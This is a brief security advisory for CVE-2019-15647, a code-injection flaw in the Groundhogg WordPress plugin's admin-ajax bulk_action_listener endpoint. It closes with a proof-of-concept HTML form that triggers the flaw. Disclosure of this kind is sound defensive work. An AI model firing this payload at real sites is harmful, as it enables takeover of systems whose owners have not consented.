#VU22280 Code Injection in Groundhogg - CVE-2019-15647
Published: October 25, 2019
Groundhogg
Adrian Tobey
Description
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to improper input validation in "wp-admin/admin-ajax.php?action=bulk_action_listener" URL. A remote authenticated attacker can send a specially crafted request and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.
PoC:
<html> <body> <form action="http://[host]/wp-admin/admin-ajax.php?action=bulk_action_listener" method="POST"> <input type="hidden" name="bulk_action" value="do_feed_rss" /> <input type="submit" value="Submit" /> </form> </body> </html>